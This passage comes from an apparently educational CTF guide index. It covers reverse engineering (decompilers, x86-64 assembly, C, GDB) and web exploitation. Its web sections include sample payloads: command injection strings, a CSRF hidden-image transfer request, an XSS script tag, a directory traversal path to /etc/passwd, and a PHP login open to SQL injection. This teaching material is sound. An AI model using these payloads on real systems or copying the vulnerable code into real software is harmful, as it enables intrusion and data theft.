"}, {"location": "forensics/what-is-wireshark/#decrypting-ssl-traffic", "title": "Decrypting SSL Traffic", "text": "By default, Wireshark cannot decrypt SSL traffic on your device unless you grant it specific certificates.
"}, {"location": "forensics/what-is-wireshark/#high-level-ssl-handshake-overview", "title": "High Level SSL Handshake Overview", "text": "In order for a network session to be encrypted properly, the client and server must share a common secret for which they can use to encrypt and decrypt data without someone in the middle being able to guess. The SSL Handshake loosely follows this format:
There are several ways to be able to decrypt traffic.
Reverse Engineering in a CTF is typically the process of taking a compiled (machine code, bytecode) program and converting it back into a more human readable format.
Very often the goal of a reverse engineering challenge is to understand the functionality of a given program such that you can identify deeper issues.
Decompilers do the impossible and reverse compiled code back into psuedocode/code.
IDA offers HexRays, which translates machine code into a higher language pseudocode.
"}, {"location": "reverse-engineering/what-are-decompilers/#example-workflow", "title": "Example Workflow", "text": "Let's say we are disassembling a program which has the source code:
#include <stdio.h>\n\nvoid printSpacer(int num){\n for(int i = 0; i < num; ++i){\n printf(\"-\");\n }\n printf(\"\\n\");\n}\n\nint main()\n{\n char* string = \"Hello, World!\";\n for(int i = 0; i < 13; ++i){\n printf(\"%c\", string[i]);\n for(int j = i+1; j < 13; j++){\n printf(\"%c\", string[j]);\n }\n printf(\"\\n\");\n printSpacer(13 - i);\n }\n return 0;\n}\n
And creates an output of:
Hello, World!\n-------------\nello, World!\n------------\nllo, World!\n-----------\nlo, World!\n----------\no, World!\n---------\n, World!\n--------\n World!\n-------\nWorld!\n------\norld!\n-----\nrld!\n----\nld!\n---\nd!\n--\n!\n-\n
If we are given a binary compiled from that source and we want to figure out how the source looks, we can use a decompiler to get c pseudocode which we can then use to reconstruct the function. The sample decompilation can look like:
printSpacer:\nint __fastcall printSpacer(int a1)\n{\n int i; // [rsp+8h] [rbp-8h]\n\n for ( i = 0; i < a1; ++i )\n printf(\"-\");\n return printf(\"\\n\");\n}\n\nmain:\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n int v4; // [rsp+18h] [rbp-18h]\n signed int i; // [rsp+1Ch] [rbp-14h]\n\n for ( i = 0; i < 13; ++i )\n {\n v4 = i + 1;\n printf(\"%c\", (unsigned int)aHelloWorld[i], envp);\n while ( v4 < 13 )\n printf(\"%c\", (unsigned int)aHelloWorld[v4++]);\n printf(\"\\n\");\n printSpacer(13 - i);\n }\n return 0;\n}\n
A good method of getting a good representation of the source is to convert the decompilation into Python since Python is basically psuedocode that runs. Starting with main often allows you to gain a good overview of what the program is doing and will help you translate the other functions.
"}, {"location": "reverse-engineering/what-are-decompilers/#main", "title": "Main", "text": "We know we will start with a main function and some variables, if you trace the execution of the variables, you can oftentimes determine the variable type. Because i is being used as an index, we know its an int, and because v4 used as one later on, it too is an index. We can also see that we have a variable aHelloWorld being printed with \"%c\", we can determine it represents the 'Hello, World!' string. Lets define all these variables in our Python main function:
def main():\n string = \"Hello, World!\"\n i = 0\n v4 = 0\n for i in range(0, 13):\n v4 = i + 1\n print(string[i], end='')\n while v4 < 13:\n print(string[v4], end='')\n v4 += 1\n print()\n printSpacer(13-i)\n
"}, {"location": "reverse-engineering/what-are-decompilers/#printspacer-function", "title": "printSpacer Function", "text": "Now we can see that printSpacer is clearly being fed an int value. Translating it into python shouldn't be too hard.
def printSpacer(number):\n i = 0\n for i in range(0, number):\n print(\"-\", end='')\n print()\n
"}, {"location": "reverse-engineering/what-are-decompilers/#results", "title": "Results", "text": "Running main() gives us:
Hello, World!\n-------------\nello, World!\n------------\nllo, World!\n-----------\nlo, World!\n----------\no, World!\n---------\n, World!\n--------\n World!\n-------\nWorld!\n------\norld!\n-----\nrld!\n----\nld!\n---\nd!\n--\n!\n-\n
"}, {"location": "reverse-engineering/what-are-disassemblers/", "title": "Disassemblers", "text": "A disassembler is a tool which breaks down a compiled program into machine code.
"}, {"location": "reverse-engineering/what-are-disassemblers/#list-of-disassemblers", "title": "List of Disassemblers", "text": "The Interactive Disassembler (IDA) is the industry standard for binary disassembly. IDA is capable of disassembling \"virtually any popular file format\". This makes it very useful to security researchers and CTF players who often need to analyze obscure files without knowing what they are or where they came from. IDA also features the industry leading Hex Rays decompiler which can convert assembly code back into a pseudo code like format.
IDA also has a plugin interface which has been used to create some successful plugins that can make reverse engineering easier:
Binary Ninja is an up and coming disassembler that attempts to bring a new, more programmatic approach to reverse engineering. Binary Ninja brings an improved plugin API and modern features to reverse engineering. While it's less popular or as old as IDA, Binary Ninja (often called binja) is quickly gaining ground and has a small community of dedicated users and followers.
Binja also has some community contributed plugins which are collected here: https://github.com/Vector35/community-plugins
"}, {"location": "reverse-engineering/what-are-disassemblers/#gdb", "title": "gdb", "text": "The GNU Debugger is a free and open source debugger which also disassembles programs. It's capable as a disassembler, but most notably it is used by CTF players for its debugging and dynamic analysis capabailities.
gdb is often used in tandom with enhancement scripts like peda, pwndbg, and GEF
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/", "title": "Assembly/Machine Code", "text": "Machine Code or Assembly is code which has been formatted for direct execution by a CPU. Machine Code is the reason why readable programming languages like C, when compiled, cannot be reversed into source code (well Decompilers can sort of, but more on that later).
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#from-source-to-compilation", "title": "From Source to Compilation", "text": "Godbolt shows the differences in machine code generated by various compilers.
For example, if we have a simple C++ function:
#include <unistd.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nint main() {\n char c;\n int fd = syscall(2, \"/etc/passwd\", 0);\n while (syscall(0, fd, &c, 1)) {\n putchar(c);\n }\n}\n
We can see the compilation results in some verbose instructions for the CPU:
.LC0:\n .string \"/etc/passwd\"\nmain:\n push rbp\n mov rbp, rsp\n sub rsp, 16\n mov edx, 0\n mov esi, OFFSET FLAT:.LC0\n mov edi, 2\n mov eax, 0\n call syscall\n mov DWORD PTR [rbp-4], eax\n.L3:\n lea rdx, [rbp-5]\n mov eax, DWORD PTR [rbp-4]\n mov ecx, 1\n mov esi, eax\n mov edi, 0\n mov eax, 0\n call syscall\n test rax, rax\n setne al\n test al, al\n je .L2\n movzx eax, BYTE PTR [rbp-5]\n movsx eax, al\n mov edi, eax\n call putchar\n jmp .L3\n.L2:\n mov eax, 0\n leave\n ret\n
This is a one way process for compiled languages as there is no way to generate source from machine code. While the machine code may seem unintelligible, the extremely basic functions can be interpreted with some practice.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#x86-64", "title": "x86-64", "text": "x86-64 or amd64 or i64 is a 64-bit Complex Instruction Set Computing (CISC) architecture. This basically means that the registers used for this architecture extend an extra 32-bits on Intel's x86 architecture. CISC means that a single instruction can do a bunch of different things at once, such as memory accesses, register reads, etc. It is also a variable-length instruction set, which means different instructions can be different sizes ranging from 1 to 16 bytes long. And finally x86-64 allows for multi-sized register access, which means that you can access certain parts of a register which are different sizes.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#x86-64-registers", "title": "x86-64 Registers", "text": "x86-64 registers behave similarly to other architectures. A key component of x86-64 registers is multi-sized access which means the register RAX can have its lower 32 bits accessed with EAX. The next lower 16 bits can be accessed with AX and the lowest 8 bits can be accessed with AL which allows for the compiler to make optimizations which boost program execution.
x86-64 has plenty of registers to use, including rax, rbx, rcx, rdx, rdi, rsi, rsp, rip, r8-r15, and more! But some registers serve special purposes.
The special registers include: - RIP: the instruction pointer - RSP: the stack pointer - RBP: the base pointer
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#instructions", "title": "Instructions", "text": "An instruction represents a single operation for the CPU to perform.
There are different types of instructions including:
mov rax, [rsp - 0x40]
add rbx, rcx
jne 0x8000400
Because x86-64 is a CISC architecture, instructions can be quite complex for machine code, such as repne scasb
which repeats up to ECX times over memory at EDI looking for a NULL byte (0x00), decrementing ECX each byte (essentially strlen() in a single instruction!).
It is important to remember that an instruction really is just memory; this idea will become useful with Return Oriented Programming or ROP.
Note
Instructions, numbers, strings, everything are always represented in hex!
add rax, rbx\nmov rax, 0xdeadbeef\nmov rax, [0xdeadbeef] == 67 48 8b 05 ef be ad de\n\"Hello\" == 48 65 6c 6c 6f\n== 48 01 d8\n== 48 c7 c0 ef be ad de\n
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#execution", "title": "Execution", "text": "What should the CPU execute? This is determined by the RIP register where IP means instruction pointer. Execution follows the pattern: fetch the instruction at the address in RIP, decode it, run it.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#examples", "title": "Examples", "text": "mov rax, 0xdeadbeef
Here the operation mov
is moving the \"immediate\" 0xdeadbeef
into the register RAX
mov rax, [0xdeadbeef + rbx * 4]
Here the operation mov
is moving the data at the address of [0xdeadbeef + RBX*4]
into the register RAX
. When brackets are used, you can think of the program as getting the content from that effective address.
-> 0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804000\n 0x080400a: add, rax, rbx RAX = 0x0\n 0x080400d: inc rbx RBX = 0x0\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n-> 0x0804005: mov ebx, 0x1234 RIP = 0x0804005\n 0x080400a: add, rax, rbx RAX = 0xdeadbeef\n 0x080400d: inc rbx RBX = 0x0\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x080400a\n-> 0x080400a: add, rax, rbx RAX = 0xdeadbeef\n 0x080400d: inc rbx RBX = 0x1234\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x080400d\n 0x080400a: add, rax, rbx RAX = 0xdeadd123\n-> 0x080400d: inc rbx RBX = 0x1234\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804010\n 0x080400a: add, rax, rbx RAX = 0xdeadd123\n 0x080400d: inc rbx RBX = 0x1235\n-> 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804013\n 0x080400a: add, rax, rbx RAX = 0xdeadbeee\n 0x080400d: inc rbx RBX = 0x1235\n 0x0804010: sub rax, rbx RCX = 0x0\n-> 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804005\n 0x080400a: add, rax, rbx RAX = 0xdeadbeee\n 0x080400d: inc rbx RBX = 0x1235\n 0x0804010: sub rax, rbx RCX = 0xdeadbeee\n 0x0804013: mov rcx, rax RDX = 0x0\n
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#control-flow", "title": "Control Flow", "text": "How can we express conditionals in x86-64? We use conditional jumps such as:
jnz <address>
je <address>
jge <address>
jle <address>
They jump if their condition is true, and just go to the next instruction otherwise. These conditionals are checking EFLAGS, which are special registers which store flags on certain instructions such as add rax, rbx
which sets the o (overflow) flag if the sum is greater than a 64-bit register can hold, and wraps around. You can jump based on that with a jo
instruction. The most important thing to remember is the cmp instruction:
cmp rax, rbx\njle error\n
This assembly jumps if RAX <= RBX"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#addresses", "title": "Addresses", "text": "Memory acts similarly to a big array where the indices of this \"array\" are memory addresses. Remember from earlier:
mov rax, [0xdeadbeef]
The square brackets mean \"get the data at this address\". This is analogous to the C/C++ syntax: rax = *0xdeadbeef;
The C programming language was written by Dennis Ritchie in the 1970s while he was working at Bell Labs. It was first used to reimplement the Unix operating system which was purely written in assembly language. At first, the Unix developers were considering using a language called \"B\" but because B wasn't optimized for the target computer, the C language was created.
Note
C is the letter and the programming language after B!
C was designed to be close to assembly and is still widely used in lower level programming where speed and control are needed (operating systems, embedded systems). C was also very influential to other programming languages used today. Notable languages include C++, Objective-C, Golang, Java, JavaScript, PHP, Python, and Rust.
"}, {"location": "reverse-engineering/what-is-c/#hello-world", "title": "Hello World", "text": "C is an ancestor of many other programming languages and if you are familiar with programming, it's likely that C will be at least somewhat familiar.
#include <stdio.h>\nint main()\n{\n printf(\"Hello, World!\");\n return 0;\n}\n
"}, {"location": "reverse-engineering/what-is-c/#today", "title": "Today", "text": "Today C is widely used either as a low level programming language or is the base language that other programming languages are implemented in.
While it can be difficult to see, the C language compiles down directly into machine code. The compiler is programmed to process the provided C code and emit assembly that's targetted to whatever operating system and architecture the compiler is set to use.
Some common compilers include:
A good way to explore this relationship is to use this online GCC Explorer from Matt Godbolt.
In regards to CTF, many reverse engineering and exploitation CTF challenges are written in C because the language compiles down directly to assembly and there are little to no safeguards in the language. This means developers must manually handle both. Of course, this can lead to mistakes which can sometimes lead to security issues.
Note
Other higher level langauges like Python manage memory and garbage collection for you. Google Golang was inspired by C, but adds in functionality like garbage collection and memory safety.
There are some examples of famously vulnerable functions in C which are still available and can still result in vulnerabilities:
gets
- Can result in buffer overflowsstrcpy
- Can result in buffer overflowsstrcat
- Can result in buffer overflowsstrcmp
- Can result in timing attacksC has four basic types:
C uses an idea known as pointers. A pointer is a variable which contains the address of another variable.
To understand this idea we should first understand that memory is laid out in terms of addresses and data gets stored at these addresses.
Take the following example of defining an integer in C:
int x = 4;\n
To the programmer this is the variable x
receiving the value of 4. The computer stores this value in some location in memory. For example we can say that address 0x1000
now holds the value 4
. The computer knows to directly access the memory and retrieve the value 4
whenever the programmer tries to use the x
variable. If we were to say x + 4
, the computer would give you 8
instead of 0x1004
.
But in C we can retrieve the memory address being used to hold the 4 value (i.e. 0x1000) by using the &
character and using *
to create an \"integer pointer\" type.
int* y = &x;\n
The y
variable will store the address pointed to by the x
variable (0x1000).
Note
The *
character allows us to declare pointer variables but also allows us to access the value stored at a pointer. For example, entering *y
allows us to access the 4 value instead of 0x1000.
Whenever we use the y
variable we are using the memory address, but if we use the x
variable we use the value stored at the memory address.
Arrays are a grouping of objects of the same type. They are typically created with the following syntax:
type arrayName [ arraySize ];\n
To initialize values in the array we can do:
int integers[ 10 ] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10};\n
Arrays allow programmers to group data into logical containers.
To access the individual elements of an array we access the contents by their \"index\". Most programming langauges today start counting from 0. So to take our previous example:
int integers[ 10 ] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10};\n/* indexes 0 1 2 3 4 5 6 7 8 9\n
To access the value 6 we would use index 5:
integers[5];\n
"}, {"location": "reverse-engineering/what-is-c/#how-do-arrays-work", "title": "How do arrays work?", "text": "Arrays are a clever combination of multiplication, pointers, and programming.
Because the computer knows the data type used for every element in the array, the computer needs to simply multiply the size of the data type by the index you are looking for and then add this value to the address of the beginning of the array.
For example if we know that the base address of an array is 1000 and we know that each integer takes 8 bytes, we know that if we have 8 integers right next to each other, we can get the integer at the 4th index with the following math:
1000 + (4 * 8) = 1032\n
array [ 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ]\nindex 0 1 2 3 4 5 6 7\naddrs 1000 1008 1016 1024 1032 1040 1048 1056\n
"}, {"location": "reverse-engineering/what-is-c/#memory-management", "title": "Memory Management", "text": ""}, {"location": "reverse-engineering/what-is-gdb/", "title": "The GNU Debugger (GDB)", "text": "The GNU Debugger or GDB is a powerful debugger which allows for step-by-step execution of a program. It can be used to trace program execution and is an important part of any reverse engineering toolkit.
"}, {"location": "reverse-engineering/what-is-gdb/#vanilla-gdb", "title": "Vanilla GDB", "text": "GDB without any modifications is unintuitive and obscures a lot of useful information. The plug-in pwndb solves a lot of these problems and makes for a much more pleasant experience. But if you are constrained and have to use vanilla gdb, here are several things to make your life easier.
"}, {"location": "reverse-engineering/what-is-gdb/#starting-gdb", "title": "Starting GDB", "text": "To execute GBD and attach it to a program simply run gdb [program]
(gdb) disassemble [address/symbol]
will display the disassembly for that function/frame
GDB will autocomplete functions, so saying (gdb) disas main
suffices if you'd like to see the disassembly of main
Another handy thing to see while stepping through a program is the disassembly of nearby instructions:
(gdb) display/[# of instructions]i $pc [\u00b1 offset]
display
shows data with each step/[#]i
shows how much data in the format i for instruction $pc
means the pc, program counter, register[\u00b1 offset]
allows you to specify how you would like the data offset from the current instruction(gdb) display/10i $pc - 0x5
This command will show 10 instructions on screen with an offset from the next instruction of 5, giving us this display:
0x8048535 <main+6>: lock pushl -0x4(%ecx)\n 0x8048539 <main+10>: push %ebp\n=> 0x804853a <main+11>: mov %esp,%ebp\n 0x804853c <main+13>: push %ecx\n 0x804853d <main+14>: sub $0x14,%esp\n 0x8048540 <main+17>: sub $0xc,%esp\n 0x8048543 <main+20>: push $0x400\n 0x8048548 <main+25>: call 0x80483a0 <malloc@plt>\n 0x804854d <main+30>: add $0x10,%esp\n 0x8048550 <main+33>: sub $0xc,%esp\n
"}, {"location": "reverse-engineering/what-is-gdb/#deleting-views", "title": "Deleting Views", "text": "If for whatever reason, a view no long suits your needs simply call (gdb) info display
which will give you a list of active displays:
Auto-display expressions now in effect:\nNum Enb Expression\n1: y /10bi $pc-0x5\n
Then simply execute (gdb) delete display 1
and your execution will resume without the display.
In order to view the state of registers with vanilla gdb, you need to run the command info registers
which will display the state of all the registers:
eax 0xf77a6ddc -142971428\necx 0xffe06b10 -2069744\nedx 0xffe06b34 -2069708\nebx 0x0 0\nesp 0xffe06af8 0xffe06af8\nebp 0x0 0x0\nesi 0xf77a5000 -142979072\nedi 0xf77a5000 -142979072\neip 0x804853a 0x804853a <main+11>\neflags 0x286 [ PF SF IF ]\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x63 99\n
If you simply would like to see the contents of a single register, the notation x/x $[register]
where:
x/x
means display the address in hex notation$[register]
is the register code such as eax, rax, etc.These commands work with vanilla gdb as well.
"}, {"location": "reverse-engineering/what-is-gdb/#setting-breakpoints", "title": "Setting Breakpoints", "text": "Setting breakpoints in GDB uses the format b*[Address/Symbol]
(gdb) b*main
: Break at the start(gdb) b*0x804854d
: Break at 0x804854d(gdb) b*0x804854d-0x100
: Break at 0x804844dAs before, in order to delete a view, you can list the available breakpoints using (gdb) info breakpoints
(don't forget about GDB's autocomplete, you don't always need to type out every command!) which will display all breakpoints:
Num Type Disp Enb Address What\n1 breakpoint keep y 0x0804852f <main>\n3 breakpoint keep y 0x0804864d <__libc_csu_init+61>\n
Then simply execute (gdb) delete 1
Note
GDB creates breakpoints chronologically and does NOT reuse numbers.
"}, {"location": "reverse-engineering/what-is-gdb/#stepping", "title": "Stepping", "text": "What good is a debugger if you can't control where you are going? In order to begin execution of a program, use the command r [arguments]
similar to how if you ran it with dot-slash notation you would execute it ./program [arguments]
. In this case the program will run normally and if no breakpoints are set, you will execute normally. If you have breakpoints set, you will stop at that instruction.
(gdb) continue [# of breakpoints]
: Resumes the execution of the program until it finishes or until another breakpoint is hit (shorthand c
)(gdb) step[# of instructions]
: Steps into an instruction the specified number of times, default is 1 (shorthand s
)(gdb) next instruction [# of instructions]
: Steps over an instruction meaning it will not delve into called functions (shorthand ni
)(gdb) finish
: Finishes a function and breaks after it gets returned (shorthand fin
)Examining data in GDB is also very useful for seeing how the program is affecting data. The notation may seem complex at first, but it is flexible and provides powerful functionality.
(gdb) x/[#][size][format] [Address/Symbol/Register][\u00b1 offset]
x/
means examine[#]
means how much[size]
means what size the data should be such as a word w (2 bytes), double word d (4 bytes), or giant word g (8 bytes)[format]
means how the data should be interpreted such as an instruction i, a string s, hex bytes x[Address/Symbol][\u00b1 offset]
means where to start interpreting the data(gdb) x/x $rax
: Displays the content of the register RAX as hex bytes(gdb) x/i 0xdeadbeef
: Displays the instruction at address 0xdeadbeef(gdb) x/10s 0x893e10
: Displays 10 strings at the address(gdb) x/10gx 0x7fe10
: Displays 10 giant words as hex at the addressIf the program happens to be an accept-and-fork server, gdb will have issues following the child or parent processes. In order to specify how you want gdb to function you can use the command set follow-fork-mode [on/off]
If you would like to set data at any point, it is possible using the command set [Address/Register]=[Hex Data]
set $rax=0x0
: Sets the register rax to 0set 0x1e4a70=0x123
: Sets the data at 0x1e4a70 to 0x123A handy way to find the process's mapped address spaces is to use info proc map
:
Mapped address spaces:\n\n Start Addr End Addr Size Offset objfile\n 0x8048000 0x8049000 0x1000 0x0 /directory/program\n 0x8049000 0x804a000 0x1000 0x0 /directory/program\n 0x804a000 0x804b000 0x1000 0x1000 /directory/program\n 0xf75cb000 0xf75cc000 0x1000 0x0\n 0xf75cc000 0xf7779000 0x1ad000 0x0 /lib32/libc-2.23.so\n 0xf7779000 0xf777b000 0x2000 0x1ac000 /lib32/libc-2.23.so\n 0xf777b000 0xf777c000 0x1000 0x1ae000 /lib32/libc-2.23.so\n 0xf777c000 0xf7780000 0x4000 0x0\n 0xf778b000 0xf778d000 0x2000 0x0 [vvar]\n 0xf778d000 0xf778f000 0x2000 0x0 [vdso]\n 0xf778f000 0xf77b1000 0x22000 0x0 /lib32/ld-2.23.so\n 0xf77b1000 0xf77b2000 0x1000 0x0\n 0xf77b2000 0xf77b3000 0x1000 0x22000 /lib32/ld-2.23.so\n 0xf77b3000 0xf77b4000 0x1000 0x23000 /lib32/ld-2.23.so\n 0xffc59000 0xffc7a000 0x21000 0x0 [stack]\n
This will show you where the stack, heap (if there is one), and libc are located.
"}, {"location": "reverse-engineering/what-is-gdb/#attaching-processes", "title": "Attaching Processes", "text": "Another useful feature of GDB is to attach to processes which are already running. Simply launch gdb using gdb
, then find the process id of the program you would like to attach to an execute attach [pid]
.
Websites all around the world are programmed using various programming languages. While there are specific vulnerabilities in each programming langage that the developer should be aware of, there are issues fundamental to the internet that can show up regardless of the chosen language or framework.
These vulnerabilities often show up in CTFs as web security challenges where the user needs to exploit a bug to gain some kind of higher level privelege.
Common vulnerabilities to see in CTF challenges:
Command Injection is a vulnerability that allows an attacker to submit system commands to a computer running a website. This happens when the application fails to encode user input that goes into a system shell. It is very common to see this vulnerability when a developer uses the system()
command or its equivalent in the programming language of the application.
import os\n\ndomain = user_input() # ctf101.org\n\nos.system('ping ' + domain)\n
The above code when used normally will ping the ctf101.org
domain.
But consider what would happen if the user_input()
function returned different data?
import os\n\ndomain = user_input() # ; ls\n\nos.system('ping ' + domain)\n
Because of the additional semicolon, the os.system()
function is instructed to run two commands.
It looks to the program as:
ping ; ls\n
Note
The semicolon terminates a command in bash and allows you to put another command after it.
Because the ping
command is being terminated and the ls
command is being added on, the ls
command will be run in addition to the empty ping command!
This is the core concept behind command injection. The ls
command could of course be switched with another command (e.g. wget, curl, bash, etc.)
Command injection is a very common means of privelege escalation within web applications and applications that interface with system commands. Many kinds of home routers take user input and directly append it to a system command. For this reason, many of those home router models are vulnerable to command injection.
"}, {"location": "web-exploitation/command-injection/what-is-command-injection/#example-payloads", "title": "Example Payloads", "text": ";ls
$(ls)
`ls`
A Cross Site Request Forgery or CSRF Attack, pronounced see surf, is an attack on an authenticated user which uses a state session in order to perform state changing attacks like a purchase, a transfer of funds, or a change of email address.
The entire premise of CSRF is based on session hijacking, usually by injecting malicious elements within a webpage through an <img>
tag or an <iframe>
where references to external resources are unverified.
GET
requests are often used by websites to get user input. Say a user signs in to an banking site which assigns their browser a cookie which keeps them logged in. If they transfer some money, the URL that is sent to the server might have the pattern:
http://securibank.com/transfer.do?acct=[RECEPIENT]&amount=[DOLLARS]
Knowing this format, an attacker can send an email with a hyperlink to be clicked on or they can include an image tag of 0 by 0 pixels which will automatically be requested by the browser such as:
<img src=\"http://securibank.com/transfer.do?acct=[RECEPIENT]&amount=[DOLLARS]\" width=\"0\" height=\"0\" border=\"0\">
Cross Site Scripting or XSS is a vulnerability where on user of an application can send JavaScript that is executed by the browser of another user of the same application.
This is a vulnerability because JavaScript has a high degree of control over a user's web browser.
For example JavaScript has the ability to:
By combining all of these abilities, XSS can maliciously use JavaScript to extract user's cookies and send them to an attacker controlled server. XSS can also modify the DOM to phish users for their passwords. This only scratches the surface of what XSS can be used to do.
XSS is typically broken down into three categories:
Reflected XSS is when an XSS exploit is provided through a URL paramater.
For example:
https://ctf101.org?data=<script>alert(1)</script>\n
You can see the XSS exploit provided in the data
GET parameter. If the application is vulnerable to reflected XSS, the application will take this data parameter value and inject it into the DOM.
For example:
<html>\n <body>\n <script>alert(1)</script>\n </body>\n</html>\n
Depending on where the exploit gets injected, it may need to be constructed differently.
Also, the exploit payload can change to fit whatever the attacker needs it to do. Whether that is to extract cookies and submit it to an external server, or to simply modify the page to deface it.
One of the deficiencies of reflected XSS however is that it requires the victim to access the vulnerable page from an attacker controlled resource. Notice that if the data paramter, wasn't provided the exploit wouldn't work.
In many situations, reflected XSS is detected by the browser because it is very simple for a browser to detect malicous XSS payloads in URLs.
"}, {"location": "web-exploitation/cross-site-scripting/what-is-cross-site-scripting/#stored-xss", "title": "Stored XSS", "text": "Stored XSS is different from reflected XSS in one key way. In reflected XSS, the exploit is provided through a GET parameter. But in stored XSS, the exploit is provided from the website itself.
Imagine a website that allows users to post comments. If a user can submit an XSS payload as a comment, and then have others view that malicious comment, it would be an example of stored XSS.
The reason being that the web site itself is serving up the XSS payload to other users. This makes it very difficult to detect from the browser's perspective and no browser is capable of generically preventing stored XSS from exploiting a user.
"}, {"location": "web-exploitation/cross-site-scripting/what-is-cross-site-scripting/#dom-xss", "title": "DOM XSS", "text": "DOM XSS is XSS that is due to the browser itself injecting an XSS payload into the DOM. While the server itself may properly prevent XSS, it's possible that the client side scripts may accidentally take a payload and insert it into the DOM and cause the payload to trigger.
The server itself is not to blame, but the client side JavaScript files are causing the issue.
"}, {"location": "web-exploitation/directory-traversal/what-is-directory-traversal/", "title": "Directory Traversal", "text": "Directory Traversal is a vulnerability where an application takes in user input and uses it in a directory path.
Any kind of path controlled by user input that isn't properly sanitized or properly sandboxed could be vulnerable to directory traversal.
For example, consider an application that allows the user to choose what page to load from a GET parameter.
<?php\n $page = $_GET['page']; // index.php\n include(\"/var/www/html/\" . $page);\n?>\n
Under normal operation the page would be index.php
. But what if a malicious user gave in something different?
<?php\n $page = $_GET['page']; // ../../../../../../../../etc/passwd\n include(\"/var/www/html/\" . $page);\n?>\n
Here the user is submitting ../../../../../../../../etc/passwd
.
This will result in the PHP interpreter leaving the directory that it is coded to look in ('/var/www/html') and instead be forced up to the root folder.
include(\"/var/www/html/../../../../../../../../etc/passwd\");\n
Ultimately this will become /etc/passwd
because the computer will not go a directory above its top directory.
Thus the application will load the /etc/passwd
file and emit it to the user like so:
root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false\nsystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false\n_apt:x:104:65534::/nonexistent:/bin/false\n
This same concept can be applied to applications where some input is taken from a user and then used to access a file or path or similar. This vulnerability very often can be used to leak sensitive data or extract application source code to find other vulnerabilities.
"}, {"location": "web-exploitation/php/what-is-php/", "title": "PHP", "text": "PHP is one of the most used languages for back-end web development and therefore it has become a target by hackers. PHP is a language which makes it painful to be secure for most instances, making it every hacker's dream target.
"}, {"location": "web-exploitation/php/what-is-php/#overview", "title": "Overview", "text": "PHP is a C-like language which uses tags enclosed by <?php ... ?>
(sometimes just <? ... ?>
). It is inlined into HTML. A word of advice is to keep the php docs open because function names are strange due to the fact that the length of function name is used to be the key in PHP's internal dictionary, so function names were shortened/lengthened to make the lookup faster. Other things include:
$name
$$name
$_GET, $_POST, $_SERVER
<?php\n if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['email']) && isset($_POST['password'])) {\n $db = new mysqli('127.0.0.1', 'cs3284', 'cs3284', 'logmein');\n $email = $_POST['email'];\n $password = sha1($_POST['password']);\n $res = $db->query(\"SELECT * FROM users WHERE email = '$email' AND password = '$password'\");\n if ($row = $res->fetch_assoc()) {\n $_SESSION['id'] = $row['id'];\n header('Location: index.php');\n die();\n }\n }\n?>\n<html>...\n
This example PHP simply checks the POST data for an email and password. If the password is equal to the hashed password in the database, the use is logged in and redirected to the index page.
The line email = '$email'
uses automatic string interpolation in order to convert $email into a string to compare with the database.
